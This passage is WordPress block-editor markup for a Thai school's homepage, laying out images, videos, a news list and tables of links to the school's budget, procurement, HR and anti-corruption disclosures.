-->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 